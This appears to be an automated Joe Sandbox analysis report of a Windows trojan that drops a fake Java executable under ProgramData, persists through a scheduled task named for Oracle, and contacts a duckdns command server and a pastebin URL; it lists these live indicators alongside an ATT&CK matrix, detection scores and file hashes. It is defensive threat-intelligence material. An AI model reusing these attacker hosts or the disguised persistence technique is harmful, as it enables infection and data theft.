Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe

Code function: 0_2_00007FF6099D2710 GetModuleHandleW,GetProcAddress,GetSystemTimeAsFileTime,

0_2_00007FF6099D2710

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	111 Windows Management Instrumentation	1 Scheduled Task/Job	112 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	131 Virtualization/Sandbox Evasion	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	1 DLL Side-Loading	112 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	131 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	14 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sE5IdDeTp2.exe	37%	ReversingLabs	Win64.Trojan.MintZard

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	37%	ReversingLabs	Win64.Trojan.MintZard

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://blockchainlegion.duckdns.org/K	0%	Avira URL Cloud	safe
http://blockchainlegion.duckg	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/)	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.phpl	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/o	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.phpzvd	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.phpC	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/j	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/pvd	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x75	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.phpvvd	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org:80/api/point.php	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/api/point.php	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org:80/api/point.phpP#	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/%	0%	Avira URL Cloud	safe
http://blockchainlegion.duckdns.org/#	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
blockchainlegion.duckdns.org	193.233.113.77	true	true		unknown
polygon-rpc.com	173.244.207.29	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://polygon-rpc.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://blockchainlegion.duckg	conhost.exe, 00000019.00000002.3065697206.0000016478655000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/j	conhost.exe, 00000019.00000002.3065697206.0000016478593000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/)	conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/K	conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.phpC	conhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/o	conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/0UNPcCFk	dialer_java.exe, 00000011.00000003.1952018182.000001BE299B0000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3064692476.0000000140095000.00000002.00000001.00020000.00000000.sdmp	false		high
http://blockchainlegion.duckdns.org/api/point.phpl	conhost.exe, 00000019.00000002.3066367565.000001647866C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://polygon-rpc.com:443/	conhost.exe, 00000019.00000003.1962703704.000001647672F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/0UNPcCFt	conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	false		high
https://polygon-rpc.com/ttings	conhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blockchainlegion.duckdns.org/	conhost.exe, 00000019.00000002.3065697206.0000016478564000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/pvd	conhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.phpzvd	conhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x75	dialer_java.exe, 00000011.00000003.1952018182.000001BE299B0000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3064692476.0000000140095000.00000002.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org:80/api/point.phpP#	conhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.phpvvd	conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/api/point.php	conhost.exe, 00000019.00000002.3065697206.0000016478655000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.00000164767AA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.000001647672F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/#	conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org:80/api/point.php	conhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blockchainlegion.duckdns.org/%	conhost.exe, 00000019.00000002.3065697206.000001647865D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.233.113.77	blockchainlegion.duckdns.org	Russian Federation		20549	FREE-MPEIRU	true
173.244.207.29	polygon-rpc.com	United States		13213	UK2NET-ASGB	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589501
Start date and time:	2025-01-12 17:37:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	137
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sE5IdDeTp2.exe renamed because original name is a hash value
Original Sample Name:	dd36f6f79e68d5e54c75527db2da97ad.exe
Detection:	MAL
Classification:	mal96.troj.expl.evad.winEXE@250/60@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 57% Number of executed functions: 8 Number of non-executed functions: 285
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:38:19	API Interceptor	262x Sleep call for process: powershell.exe modified
11:38:27	API Interceptor	38x Sleep call for process: conhost.exe modified
16:38:23	Task Scheduler	Run new task: Oracle Corporation path: %ProgramData%\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
173.244.207.29	https://web3resolution.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	http://debugticket.vercel.app/	Get hash	malicious	HTMLPhisher	Browse
	https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse
	https://metagalaxy.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	http://bridge-a3vigrfjd-pancakeswap.vercel.app/	Get hash	malicious	Unknown	Browse
	https://bafybeih5zpu7rzaoeodorqhminsbsmv3eswg6px7qixdtiwflfle6cv364.ipfs.dweb.link/	Get hash	malicious	Unknown	Browse
	http://ecometanexus.unids.com/	Get hash	malicious	Unknown	Browse
	https://simplescalingdefender.pages.dev/	Get hash	malicious	Unknown	Browse
	http://rewardsforyoutoclaim.pages.dev/	Get hash	malicious	Unknown	Browse
	http://rewards-tokss-foryou.pages.dev/	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-MPEIRU	https://sora-ai-download.com/	Get hash	malicious	Unknown	Browse	193.233.112.39
	Set-up.exe	Get hash	malicious	Unknown	Browse	193.233.84.212
	XODc5nV1kC.exe	Get hash	malicious	LummaC	Browse	193.233.112.194
	BnxBRWQWhy.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44
	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.113.184
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	193.233.121.52
UK2NET-ASGB	LbtytfWpvx.vbs	Get hash	malicious	Remcos	Browse	45.80.158.30
	BBVA S.A..vbs	Get hash	malicious	Remcos	Browse	45.80.158.30
	173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe	Get hash	malicious	Remcos	Browse	45.80.158.30
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	45.80.158.30
	main_m68k.elf	Get hash	malicious	Mirai	Browse	77.92.90.50
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	88.202.185.180
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	46.28.54.10
	173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.80.158.30
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.80.158.30
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	80.209.188.4

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	TBI87y49f9.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	H5JVfa61AV.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	2EG0jAmtY6.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	5vrRrFN56j.exe	Get hash	malicious	Bdaejec	Browse	173.244.207.29
	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	173.244.207.29
	installer_1.05_37.4.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	Set-up.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	173.244.207.29
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	173.244.207.29
	x.exe	Get hash	malicious	LummaC	Browse	173.244.207.29

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Download File

Process:	C:\Users\user\Desktop\sE5IdDeTp2.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1245320
Entropy (8bit):	6.811982830856188
Encrypted:	false
SSDEEP:	12288:2iQnVXYD4TNwzBcgXn0dE/xmiNrP64F78O9PpctLMbl0UVh4OsYX0bLDHOM5p:KNw1iS/EiNb64F78yPd+WDsYX0bLzOCp
MD5:	DD36F6F79E68D5E54C75527DB2DA97AD
SHA1:	A373E613510ADA66CEA74FFC590C25EDC59957AC
SHA-256:	3030BA393865E41FEE490205BF5873B4041275A8830D5E764693771FEC2BD35E
SHA-512:	E1F9E1C8D246FD381D5AF12C87940DF54DF9F6877BFF58ABDEA7A8D533A31A675B553D7E5BB134BB64576DE53A3C72C4E8A3E624A639C13DFA918F2A4A638FD1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...X.g.........."......~...V......@..........@.............................P............`.....................................................<....0..@.......L........(...@.................................(.......8............................................text....}.......~.................. ..`.rdata..0...........................@..@.data.......0......................@....pdata..L...........................@..@.00cfg..............................@..@.tls......... ......................@....rsrc...@....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hpv55ni.elg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vzha0zp.knk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1au5v25x.zij.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
